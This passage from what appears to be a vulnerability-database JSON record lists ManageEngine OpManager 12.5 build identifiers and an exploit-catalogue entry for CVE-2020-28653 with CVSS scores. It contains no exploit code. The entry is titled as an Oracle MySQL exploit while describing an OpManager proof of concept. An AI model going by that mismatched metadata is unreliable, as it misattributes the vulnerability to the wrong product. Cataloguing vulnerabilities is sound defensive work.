"cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125140:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125145:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125158:*:*:*:*:*:*", 
"cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125120:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125177:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125176:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125231:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125123:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125312:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125213:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125110:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125197:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125326:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125195:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125124:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125175:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125228:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125100:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125139:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125229:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125212:*:*:*:*:*:*"]}], "githubexploit": [{"lastseen": "2022-02-01T00:00:00", "description": "# Manage Engine OpManager CVE-2020-28653 Proof of Concept\n\nThis ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-13T17:27:02", "type": "githubexploit", "title": "Exploit for Vulnerability in 
Oracle MySQL", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28653", "CVE-2020-2853"], "modified": "2022-02-05T08:04:25", "id": "0F834290-5FF5-5671-950A-8A63A82265B0", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}]}